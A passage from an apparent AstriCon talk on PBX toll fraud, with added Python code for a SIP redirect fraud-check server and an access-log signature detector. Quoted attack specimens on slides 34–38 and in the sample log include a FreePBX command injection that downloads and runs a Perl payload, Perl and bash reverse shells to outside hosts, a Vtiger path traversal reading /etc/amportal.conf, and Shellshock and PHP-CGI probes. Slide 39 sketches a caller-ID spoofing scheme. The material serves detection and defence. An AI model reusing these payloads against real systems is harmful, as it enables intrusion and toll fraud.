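The two contexts above need a SIP redirect server on the other end. As an added example, not SipPulse's or TFPS's code (the service's rules are not published), here is a minimal redirect decision in Python: it parses the INVITE Asterisk sends, reads only the P-Received, P-UA and P-Calls headers the dialplan adds, and answers 302 with an A<number> or R<number> Contact for the [fps] context. The policy (a blocklist shared between PBXs, scanner User-Agent strings, a concurrent-call cap and a tighter cap for the prefixes on slide 7), the host name, the addresses and the sample INVITE are all constructed for the example; the P-FPS-Reason header is hypothetical.

```python
"""SIP redirect decision for the [from-internal]/[fps] dialplan above.

Added example, not SipPulse/TFPS code. The policy below is a hypothetical stand-in
that uses only the three P-* headers the dialplan adds; hosts, addresses and the
sample INVITE are constructed.
"""
import re

SHARED_IP_BLOCKLIST = {"203.0.113.66"}                   # constructed: IP reported by another PBX
SCANNER_USER_AGENTS = ("friendly-scanner", "sipvicious", "sipcli")   # assumed scanner UAs
MAX_CONCURRENT = 3                                       # assumed cap on calls in GROUP fps
HIGH_RISK_PREFIX_CAP = {"972": 1, "20": 1, "86": 1}      # assumed: tighter cap for slide-7 prefixes


def parse_invite(msg):
    """Return (dialled number, headers) from a raw INVITE; header names lower-cased."""
    lines = msg.replace("\r\n", "\n").split("\n")
    m = re.match(r"INVITE sip:\+?(\d+)@", lines[0])
    if not m:
        raise ValueError("not an INVITE")
    headers = {}
    for raw in lines[1:]:
        if not raw.strip():
            break                                        # blank line ends the header block
        name, _, value = raw.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group(1), headers


def decide(number, headers):
    """Return ('A', reason) to approve the call or ('R', reason) to reject it."""
    source = headers.get("p-received", "")
    ua = headers.get("p-ua", "").lower()
    try:
        calls = int(headers.get("p-calls", "0"))
    except ValueError:
        calls = MAX_CONCURRENT + 1                       # a mangled counter counts as over the cap
    if source in SHARED_IP_BLOCKLIST:
        return "R", f"{source} already reported by another PBX"
    if any(s in ua for s in SCANNER_USER_AGENTS):
        return "R", f"scanner user-agent {ua}"
    if calls > MAX_CONCURRENT:
        return "R", f"{calls} concurrent international calls"
    for prefix, cap in HIGH_RISK_PREFIX_CAP.items():
        if number.startswith(prefix) and calls > cap:
            return "R", f"+{prefix} limited to {cap} concurrent call(s)"
    return "A", "policy passed"


def redirect_response(msg, host="fps.example.invalid"):
    """Build the 302 whose Contact user is A<number> or R<number>. With chan_sip's default
    (promiscredir=no) Asterisk follows it as Local/<user>@fps, which _A./_R. above catch."""
    number, h = parse_invite(msg)
    verdict, reason = decide(number, h)
    response = "\r\n".join([
        "SIP/2.0 302 Moved Temporarily",
        f"Via: {h.get('via', '')}",
        f"From: {h.get('from', '')}",
        f"To: {h.get('to', '')};tag=fps302",             # a real server uses a random tag per dialog
        f"Call-ID: {h.get('call-id', '')}",
        f"CSeq: {h.get('cseq', '')}",
        f"Contact: <sip:{verdict}{number}@{host}>",
        f"P-FPS-Reason: {reason}",                       # hypothetical header, for the PBX's logs
        "Content-Length: 0",
        "", "",
    ])
    return verdict, response


# Constructed INVITE as the dialplan on slide 27 would send it.
SAMPLE_INVITE = "\r\n".join([
    "INVITE sip:972501234567@fps.example.invalid SIP/2.0",
    "Via: SIP/2.0/UDP 198.51.100.20:5060;branch=z9hG4bK-1",
    "From: <sip:1001@198.51.100.20>;tag=a1",
    "To: <sip:972501234567@fps.example.invalid>",
    "Call-ID: 1@198.51.100.20",
    "CSeq: 1 INVITE",
    "P-Received: 203.0.113.9",
    "P-UA: Yealink SIP-T22 7.73.0.50",
    "P-Calls: 1",
    "Content-Length: 0",
    "", "",
])

if __name__ == "__main__":
    print(redirect_response(SAMPLE_INVITE)[1])
```

The order of the checks is the design point: cheap, high-confidence rejections (an address another PBX already reported, a scanner User-Agent) come before the rate-based ones, and a malformed P-Calls is treated as over the cap rather than ignored, so a phone that strips or garbles the header cannot talk its way past the limit.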
  • 30. Comparing to other anti-fraud solutions: pluggable; no additional hardware; only a small amount of traffic to be analyzed; small risk, only a few calls can be affected; easy handling of outages.
  • 32. Thank you! e-mail: flavio@sippulse.com; Skype: flaviogoncalves1; Twitter: @asteriskguide; blog.tfps.co
  • 34. #6 FreePBX 2.x code execution. Specimen (the api handler's system function runs args as a shell command, here downloading and running a Perl payload):
      [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
  • 35. #4 Vtiger exploit (lots of variations). 0001189: Vtiger CRM - PHP inject vulnerability. Specimens (a path traversal with a trailing null byte aimed at /etc/amportal.conf, and a module-path injection):
      108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"
      93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"
  • 36. #4 PHP code injection vulnerability. Specimen, as logged:
      [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-"
    Decoded (the ip parameter carries a Perl reverse shell to 93.170.130.201:3333):
      "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\nunk\n"); system$_ while<>;'
  • 37. #9 FreePBX extension dump exploitation. Specimen:
      184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"
  • 38. #6 FreeSWITCH attacks. Specimen:
      GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
  • 39. #4 Caller ID spoofing: 1. send a million calls and cancel them; 2. fake the caller ID to a PRN; 3. wait for the call back.
  • 40. Open source is a target! We are seeing scans for: Vicidial, Astpp, phpMyAdmin (hot), Tomcat, JBoss, FreeSWITCH.
  • 41. First way to protect: make sure your system is protected by a firewall. 1. Vulnerability scan. 2. Apply firewall rules to prevent unauthorized access to the server. 3. Use .htaccess and add a second authentication layer in front of the web GUI.
  • 42. #5 SIP phone recent vulnerabilities (CVSS score in parentheses): Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10.0); Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3); Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9); Yealink - http://www.cvedetails.com/cve/CVE-2014-3427/; Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/
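The HTTP specimens on slides 9 to 14 and 34 to 38 are exactly what the signature detection of slides 25 and 26 keys on. As an added example, not the author's or TFPS's code, here is signature matching run over Apache access-log lines shaped like those specimens: the log lines are constructed (client IPs from documentation ranges, request strings copied from the slides), the signature names and patterns are this example's own, and the two CVE identifiers are the public ones for Shellshock and the PHP-CGI argument injection. Percent-decoding before matching is the point the encoded PHP-CGI probe on slide 12 makes: the encoded and decoded forms of the same request must hit the same rule.

```python
"""Signature matching over Apache access-log lines for the PBX HTTP exploits above.

Added example, not the author's or TFPS's code. Patterns are derived from the
request strings on the slides; the log lines, client IPs (documentation ranges)
and signature names are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Apache combined format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# (name, pattern), applied to the percent-decoded request line, referer and user-agent.
SIGNATURES = [
    ("shellshock CVE-2014-6271", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("php-cgi argument injection CVE-2012-1823",
     re.compile(r"/cgi-bin/php\S*\?.*?(allow_url_include|auto_prepend_file)")),
    ("trixbox web-meetme sqli", re.compile(r"/web-meetme/conf_cdr\.php\?.*bookId=")),
    ("linksys tmUnblock", re.compile(r"/tmUnblock\.cgi")),
    ("freepbx callme_page", re.compile(r"/recordings/misc/callme_page\.php\?.*callmenum=")),
    ("freepbx config.php api system",
     re.compile(r"/admin/config\.php\?.*handler=api.*function=system")),
    ("freepbx footer.php injection", re.compile(r"/admin/footer\.php\?.*php=info")),
    ("vtiger traversal", re.compile(r"/vtigercrm/\S*?(\.\./|\x00)")),
    ("freepbx cdr call-log", re.compile(r"/admin/cdr/call-log\.php\?.*handler=cdr")),
    ("freeswitch provision", re.compile(r"/freeswitch/app/provision/index\.php\?.*template=")),
    ("reverse shell payload", re.compile(r"/dev/tcp/|IO::Socket::INET")),
]


def normalize(text):
    """Percent-decode until stable (bounded), so the encoded PHP-CGI probe on slide 12
    matches the same pattern as its decoded form; '+' becomes a space as in query strings."""
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def parse(line):
    """Split one log line into fields with request/referer/ua decoded; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    for key in ("request", "referer", "ua"):
        fields[key] = normalize(fields[key] or "-")
    return fields


def classify(line):
    """Names of every signature that fires on the line (empty list for benign traffic)."""
    fields = parse(line)
    if fields is None:
        return []
    haystack = "\n".join((fields["request"], fields["referer"], fields["ua"]))
    return [name for name, rx in SIGNATURES if rx.search(haystack)]


def offenders(lines):
    """Source IP -> set of signatures seen. One hit is enough to put the IP on a shared
    blocklist, which is the 'one PBX hacked blocks the IP for the others' idea on slide 26."""
    hits = {}
    for line in lines:
        names = classify(line)
        if names:
            hits.setdefault(parse(line)["ip"], set()).update(names)
    return hits


# Constructed log lines: request strings mirror the slides, client IPs are documentation addresses.
SAMPLE_LOG = r'''
198.51.100.10 - - [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
198.51.100.11 - - [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0"
198.51.100.12 - - [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7"
198.51.100.13 - - [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
198.51.100.14 - - [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
198.51.100.15 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"
203.0.113.5 - - [03/Jul/2014:09:00:00 +0000] "GET /admin/config.php?display=extensions HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for ip, names in sorted(offenders(SAMPLE_LOG).items()):
        print(f"block {ip}: {', '.join(sorted(names))}")
```

Feed real logs through classify() one line at a time; offenders() is the list a collaborative service would push to the other PBXs. The patterns are tuned to these request strings and will need extending; the benign config.php line at the end is there to show that a sensitive path alone must not fire, only the parameters that make it an exploit.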

Editor's Notes

  1. Hello everybody. In the first place I would like to say thanks to the Astricon staff for this wonderful event in Las Vegas and for the opportunity to be talking with you. It is a pleasure and an honor for me to be here today. Our presentation today will cover the fraud issue. It is not new, but unfortunately it is still here and growing. It is time to say enough is enough. There is no technical justification for being defrauded these days. There are lots of tools available, and we can work together to make sure your server is protected against these criminals.
  2. Let me briefly introduce myself. I’m CEO of SipPulse, a softswitch developer located in Brazil. We provide turnkey solutions for ITSPs and also anti-fraud solutions for PBXs.
  3. #1 You don’t want to bankrupt your customers. An IP-PBX is one of the few technologies that can bankrupt your customer in less than 30 days. Working with an IP-PBX and TDM trunks is actually very dangerous, because there are no limits on phone bills. #2 You don’t want to defend yourself in court. In many cases, mainly when you are doing Software as a Service, you can be liable for the security of the solution. #3 You don’t want to stigmatize the Asterisk PBX market and slow sales. If some customers realized the potential danger of implementing an IP-PBX, many would give up without even starting. Fraud is bad for business. #4 You don’t want the investments in IP telephony going to phone bills. Fraud can consume the customer’s yearly budget.